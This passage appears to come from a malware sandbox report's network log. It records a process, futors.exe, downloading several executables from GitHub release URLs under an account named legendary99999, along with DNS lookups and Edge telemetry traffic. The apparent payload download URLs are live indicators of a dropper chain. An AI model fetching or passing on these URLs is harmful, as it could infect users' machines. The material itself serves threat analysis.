                                                                                              Server: GitHub.com
                                                                                              Date: Thu, 20 Feb 2025 00:34:35 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                              Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/933717859/3158e964-6e73-4443-84f8-ddb304d57b87?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003435Z&X-Amz-Expires=300&X-Amz-Signature=f77e2f934b6db0dcdfdf9419e052f8c8ed4bdaf93aca348f73976eb1a93e252c&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3D12321321.exe&response-content-type=application%2Foctet-stream
                                                                                              Cache-Control: no-cache
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                              X-Frame-Options: deny
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                              Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                                                                                              Content-Length: 0
                                                                                              X-GitHub-Request-Id: 5849:28646A:403D1D:5041E8:67B67893
                                                                                            • [GB]
                                                                                              GET
                                                                                              https://github.com/legendary99999/fsdfdsfds/releases/download/sdffdsfsddfs/alex12112.exe
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              20.26.156.215:443
                                                                                              Request
                                                                                              GET /legendary99999/fsdfdsfds/releases/download/sdffdsfsddfs/alex12112.exe HTTP/1.1
                                                                                              Host: github.com
                                                                                              Response
                                                                                              HTTP/1.1 302 Found
                                                                                              Server: GitHub.com
                                                                                              Date: Thu, 20 Feb 2025 00:34:40 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                              Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/933910050/851ed480-459a-4e09-83d2-9ce8a09d0744?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003440Z&X-Amz-Expires=300&X-Amz-Signature=df4602c7473369f1ea873854603106cdd7f289af4ae5957ac9d4b2cef6079407&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dalex12112.exe&response-content-type=application%2Foctet-stream
                                                                                              Cache-Control: no-cache
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                              X-Frame-Options: deny
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                              Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                                                                                              Content-Length: 0
                                                                                              X-GitHub-Request-Id: 5849:28646A:403ECB:504427:67B6789B
                                                                                            • [GB]
                                                                                              GET
                                                                                              https://github.com/legendary99999/fdfsdfdssfd/releases/download/dfsdfsdfsdsf/fher.exe
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              20.26.156.215:443
                                                                                              Request
                                                                                              GET /legendary99999/fdfsdfdssfd/releases/download/dfsdfsdfsdsf/fher.exe HTTP/1.1
                                                                                              Host: github.com
                                                                                              Response
                                                                                              HTTP/1.1 302 Found
                                                                                              Server: GitHub.com
                                                                                              Date: Thu, 20 Feb 2025 00:34:44 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                              Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/935547594/67a4ea0f-a626-4118-b393-80fb7fdc2175?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003444Z&X-Amz-Expires=300&X-Amz-Signature=6fba39a086068076713cfdf4ac9efbb211495ae5df743c851de203108f97e0f3&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dfher.exe&response-content-type=application%2Foctet-stream
                                                                                              Cache-Control: no-cache
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                              X-Frame-Options: deny
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                              Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                                                                                              Content-Length: 0
                                                                                              X-GitHub-Request-Id: 5849:28646A:4040ED:5046DB:67B678A0
                                                                                            • [US]
                                                                                              DNS
                                                                                              i.instagram.com
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              i.instagram.com
                                                                                              IN A
                                                                                              Response
                                                                                              i.instagram.com
                                                                                              IN CNAME
                                                                                              instagram.c10r.instagram.com
                                                                                              instagram.c10r.instagram.com
                                                                                              IN A
                                                                                              163.70.151.63
                                                                                            • flag-us
                                                                                              DNS
                                                                                              objects.githubusercontent.com
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              objects.githubusercontent.com
                                                                                              IN A
                                                                                              Response
                                                                                              objects.githubusercontent.com
                                                                                              IN A
                                                                                              185.199.108.133
                                                                                              objects.githubusercontent.com
                                                                                              IN A
                                                                                              185.199.110.133
                                                                                              objects.githubusercontent.com
                                                                                              IN A
                                                                                              185.199.111.133
                                                                                              objects.githubusercontent.com
                                                                                              IN A
                                                                                              185.199.109.133
                                                                                            • flag-us
                                                                                              GET
                                                                                              https://objects.githubusercontent.com/github-production-release-asset-2e65be/931090743/fe2351f3-d512-4704-a31e-e7267ddf3e14?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003417Z&X-Amz-Expires=300&X-Amz-Signature=66a4490c649969e8e57e49179dcb3d281f5845caaa83cbf7476823ad7406f82a&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dtrano1221.exe&response-content-type=application%2Foctet-stream
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.199.108.133:443
                                                                                              Request
                                                                                              GET /github-production-release-asset-2e65be/931090743/fe2351f3-d512-4704-a31e-e7267ddf3e14?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003417Z&X-Amz-Expires=300&X-Amz-Signature=66a4490c649969e8e57e49179dcb3d281f5845caaa83cbf7476823ad7406f82a&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dtrano1221.exe&response-content-type=application%2Foctet-stream HTTP/1.1
                                                                                              Host: objects.githubusercontent.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 20365153
                                                                                              Content-Type: application/octet-stream
                                                                                              Last-Modified: Tue, 11 Feb 2025 17:47:37 GMT
                                                                                              ETag: "0x8DD4AC42CABB08E"
                                                                                              Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                              x-ms-request-id: e3e51486-101e-006b-5dad-7c66a1000000
                                                                                              x-ms-version: 2025-01-05
                                                                                              x-ms-creation-time: Tue, 11 Feb 2025 17:47:37 GMT
                                                                                              x-ms-lease-status: unlocked
                                                                                              x-ms-lease-state: available
                                                                                              x-ms-blob-type: BlockBlob
                                                                                              Content-Disposition: attachment; filename=trano1221.exe
                                                                                              x-ms-server-encrypted: true
                                                                                              Via: 1.1 varnish, 1.1 varnish
                                                                                              Fastly-Restarts: 1
                                                                                              Accept-Ranges: bytes
                                                                                              Age: 4262
                                                                                              Date: Thu, 20 Feb 2025 00:34:18 GMT
                                                                                              X-Served-By: cache-iad-kcgs7200119-IAD, cache-lon420138-LON
                                                                                              X-Cache: HIT, HIT
                                                                                              X-Cache-Hits: 1, 0
                                                                                              X-Timer: S1740011658.750016,VS0,VE1
                                                                                            • flag-us
                                                                                              GET
                                                                                              https://objects.githubusercontent.com/github-production-release-asset-2e65be/932430920/f3727065-e97b-4230-9333-63b156bde389?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003427Z&X-Amz-Expires=300&X-Amz-Signature=d0a095dda97f3ae2552aa4991862c4e6a4469581f8b8e7c7c9530a03e2528eb7&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dcon12312211221.exe&response-content-type=application%2Foctet-stream
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.199.108.133:443
                                                                                              Request
                                                                                              GET /github-production-release-asset-2e65be/932430920/f3727065-e97b-4230-9333-63b156bde389?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003427Z&X-Amz-Expires=300&X-Amz-Signature=d0a095dda97f3ae2552aa4991862c4e6a4469581f8b8e7c7c9530a03e2528eb7&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dcon12312211221.exe&response-content-type=application%2Foctet-stream HTTP/1.1
                                                                                              Host: objects.githubusercontent.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 358400
                                                                                              Content-Type: application/octet-stream
                                                                                              Last-Modified: Thu, 13 Feb 2025 22:40:28 GMT
                                                                                              ETag: "0x8DD4C7F6A75E5D3"
                                                                                              Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                              x-ms-request-id: c7acd6d4-001e-0067-7668-7ef1a9000000
                                                                                              x-ms-version: 2025-01-05
                                                                                              x-ms-creation-time: Thu, 13 Feb 2025 22:40:28 GMT
                                                                                              x-ms-blob-content-md5: qOrTFoeSYXKTn2wfQLbMMQ==
                                                                                              x-ms-lease-status: unlocked
                                                                                              x-ms-lease-state: available
                                                                                              x-ms-blob-type: BlockBlob
                                                                                              Content-Disposition: attachment; filename=con12312211221.exe
                                                                                              x-ms-server-encrypted: true
                                                                                              Via: 1.1 varnish, 1.1 varnish
                                                                                              Fastly-Restarts: 1
                                                                                              Accept-Ranges: bytes
                                                                                              Age: 4286
                                                                                              Date: Thu, 20 Feb 2025 00:34:27 GMT
                                                                                              X-Served-By: cache-iad-kjyo7100179-IAD, cache-lon420138-LON
                                                                                              X-Cache: HIT, HIT
                                                                                              X-Cache-Hits: 29, 0
                                                                                              X-Timer: S1740011667.106967,VS0,VE1
                                                                                            • flag-us
                                                                                              GET
                                                                                              https://objects.githubusercontent.com/github-production-release-asset-2e65be/933717859/3158e964-6e73-4443-84f8-ddb304d57b87?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003435Z&X-Amz-Expires=300&X-Amz-Signature=f77e2f934b6db0dcdfdf9419e052f8c8ed4bdaf93aca348f73976eb1a93e252c&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3D12321321.exe&response-content-type=application%2Foctet-stream
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.199.108.133:443
                                                                                              Request
                                                                                              GET /github-production-release-asset-2e65be/933717859/3158e964-6e73-4443-84f8-ddb304d57b87?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003435Z&X-Amz-Expires=300&X-Amz-Signature=f77e2f934b6db0dcdfdf9419e052f8c8ed4bdaf93aca348f73976eb1a93e252c&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3D12321321.exe&response-content-type=application%2Foctet-stream HTTP/1.1
                                                                                              Host: objects.githubusercontent.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 356894
                                                                                              Content-Type: application/octet-stream
                                                                                              Last-Modified: Sun, 16 Feb 2025 14:38:54 GMT
                                                                                              ETag: "0x8DD4E97A385FA05"
                                                                                              Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                              x-ms-request-id: 04f1f775-201e-0002-7a80-805fed000000
                                                                                              x-ms-version: 2025-01-05
                                                                                              x-ms-creation-time: Sun, 16 Feb 2025 14:38:54 GMT
                                                                                              x-ms-blob-content-md5: zoaUIANmZaIoyGWZNh8EIw==
                                                                                              x-ms-lease-status: unlocked
                                                                                              x-ms-lease-state: available
                                                                                              x-ms-blob-type: BlockBlob
                                                                                              Content-Disposition: attachment; filename=12321321.exe
                                                                                              x-ms-server-encrypted: true
                                                                                              Via: 1.1 varnish, 1.1 varnish
                                                                                              Fastly-Restarts: 1
                                                                                              Accept-Ranges: bytes
                                                                                              Age: 3723
                                                                                              Date: Thu, 20 Feb 2025 00:34:36 GMT
                                                                                              X-Served-By: cache-iad-kiad7000042-IAD, cache-lon420138-LON
                                                                                              X-Cache: HIT, HIT
                                                                                              X-Cache-Hits: 30, 0
                                                                                              X-Timer: S1740011676.919650,VS0,VE2
                                                                                            • flag-us
                                                                                              GET
                                                                                              https://objects.githubusercontent.com/github-production-release-asset-2e65be/933910050/851ed480-459a-4e09-83d2-9ce8a09d0744?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003440Z&X-Amz-Expires=300&X-Amz-Signature=df4602c7473369f1ea873854603106cdd7f289af4ae5957ac9d4b2cef6079407&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dalex12112.exe&response-content-type=application%2Foctet-stream
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.199.108.133:443
                                                                                              Request
                                                                                              GET /github-production-release-asset-2e65be/933910050/851ed480-459a-4e09-83d2-9ce8a09d0744?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003440Z&X-Amz-Expires=300&X-Amz-Signature=df4602c7473369f1ea873854603106cdd7f289af4ae5957ac9d4b2cef6079407&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dalex12112.exe&response-content-type=application%2Foctet-stream HTTP/1.1
                                                                                              Host: objects.githubusercontent.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 353280
                                                                                              Content-Type: application/octet-stream
                                                                                              Last-Modified: Mon, 17 Feb 2025 00:17:41 GMT
                                                                                              ETag: "0x8DD4EE87E7807E5"
                                                                                              Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                              x-ms-request-id: 2412be9a-401e-0004-03d1-806c52000000
                                                                                              x-ms-version: 2025-01-05
                                                                                              x-ms-creation-time: Mon, 17 Feb 2025 00:17:41 GMT
                                                                                              x-ms-blob-content-md5: EvXHLtRrRzCjAZBTv1zCBg==
                                                                                              x-ms-lease-status: unlocked
                                                                                              x-ms-lease-state: available
                                                                                              x-ms-blob-type: BlockBlob
                                                                                              Content-Disposition: attachment; filename=alex12112.exe
                                                                                              x-ms-server-encrypted: true
                                                                                              Via: 1.1 varnish, 1.1 varnish
                                                                                              Fastly-Restarts: 1
                                                                                              Accept-Ranges: bytes
                                                                                              Age: 3819
                                                                                              Date: Thu, 20 Feb 2025 00:34:40 GMT
                                                                                              X-Served-By: cache-iad-kcgs7200032-IAD, cache-lon420138-LON
                                                                                              X-Cache: HIT, HIT
                                                                                              X-Cache-Hits: 36, 0
                                                                                              X-Timer: S1740011680.378935,VS0,VE1
                                                                                            • flag-us
                                                                                              GET
                                                                                              https://objects.githubusercontent.com/github-production-release-asset-2e65be/935547594/67a4ea0f-a626-4118-b393-80fb7fdc2175?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003444Z&X-Amz-Expires=300&X-Amz-Signature=6fba39a086068076713cfdf4ac9efbb211495ae5df743c851de203108f97e0f3&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dfher.exe&response-content-type=application%2Foctet-stream
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.199.108.133:443
                                                                                              Request
                                                                                              GET /github-production-release-asset-2e65be/935547594/67a4ea0f-a626-4118-b393-80fb7fdc2175?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003444Z&X-Amz-Expires=300&X-Amz-Signature=6fba39a086068076713cfdf4ac9efbb211495ae5df743c851de203108f97e0f3&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dfher.exe&response-content-type=application%2Foctet-stream HTTP/1.1
                                                                                              Host: objects.githubusercontent.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 696832
                                                                                              Content-Type: application/octet-stream
                                                                                              Last-Modified: Wed, 19 Feb 2025 16:14:22 GMT
                                                                                              ETag: "0x8DD510078CCBC40"
                                                                                              Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                              x-ms-request-id: f4315236-101e-0036-38e9-826c25000000
                                                                                              x-ms-version: 2025-01-05
                                                                                              x-ms-creation-time: Wed, 19 Feb 2025 16:14:22 GMT
                                                                                              x-ms-blob-content-md5: qKWDqIARGmO8gQN+4CSOGQ==
                                                                                              x-ms-lease-status: unlocked
                                                                                              x-ms-lease-state: available
                                                                                              x-ms-blob-type: BlockBlob
                                                                                              Content-Disposition: attachment; filename=fher.exe
                                                                                              x-ms-server-encrypted: true
                                                                                              Via: 1.1 varnish, 1.1 varnish
                                                                                              Fastly-Restarts: 1
                                                                                              Accept-Ranges: bytes
                                                                                              Age: 2225
                                                                                              Date: Thu, 20 Feb 2025 00:34:45 GMT
                                                                                              X-Served-By: cache-iad-kjyo7100172-IAD, cache-lon420138-LON
                                                                                              X-Cache: HIT, HIT
                                                                                              X-Cache-Hits: 56, 0
                                                                                              X-Timer: S1740011685.988932,VS0,VE1
                                                                                            • flag-us
                                                                                              DNS
                                                                                              nw-umwatson.events.data.microsoft.com
                                                                                              msedge.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              nw-umwatson.events.data.microsoft.com
                                                                                              IN A
                                                                                              Response
                                                                                              nw-umwatson.events.data.microsoft.com
                                                                                              IN CNAME
                                                                                              blobcollector.events.data.trafficmanager.net
                                                                                              blobcollector.events.data.trafficmanager.net
                                                                                              IN CNAME
                                                                                              onedsblobprdeus15.eastus.cloudapp.azure.com
                                                                                              onedsblobprdeus15.eastus.cloudapp.azure.com
                                                                                              IN A
                                                                                              20.42.73.29
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://nw-umwatson.events.data.microsoft.com/Telemetry.Request
                                                                                              msedge.exe
                                                                                              Remote address:
                                                                                              20.42.73.29:443
                                                                                              Request
                                                                                              POST /Telemetry.Request HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/xml
                                                                                              User-Agent: Crashpad/0.8.0 WinHTTP/10.0.19041.1151 Windows_NT/10.0.19041.1202 (x64)
                                                                                              MSA_DeviceTicket: t=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&p=
                                                                                              Content-Length: 3400
                                                                                              Host: nw-umwatson.events.data.microsoft.com
                                                                                              Response
                                                                                              HTTP/1.1 200 200 OK
                                                                                              Content-Length: 638
                                                                                              Content-Type: text/xml
                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Access-Control-Allow-Methods: POST
                                                                                              Access-Control-Allow-Credentials: true
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Date: Thu, 20 Feb 2025 00:34:20 GMT
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://nw-umwatson.events.data.microsoft.com/Telemetry.Request
                                                                                              msedge.exe
                                                                                              Remote address:
                                                                                              20.42.73.29:443
                                                                                              Request
                                                                                              POST /Telemetry.Request HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/xml
                                                                                              User-Agent: Crashpad/0.8.0 WinHTTP/10.0.19041.1151 Windows_NT/10.0.19041.1202 (x64)
                                                                                              MSA_DeviceTicket: t=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&p=
                                                                                              Content-Length: 3400
                                                                                              Host: nw-umwatson.events.data.microsoft.com
                                                                                              Response
                                                                                              HTTP/1.1 200 200 OK
                                                                                              Content-Length: 638
                                                                                              Content-Type: text/xml
                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Access-Control-Allow-Methods: POST
                                                                                              Access-Control-Allow-Credentials: true
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Date: Thu, 20 Feb 2025 00:34:21 GMT
                                                                                            • flag-us
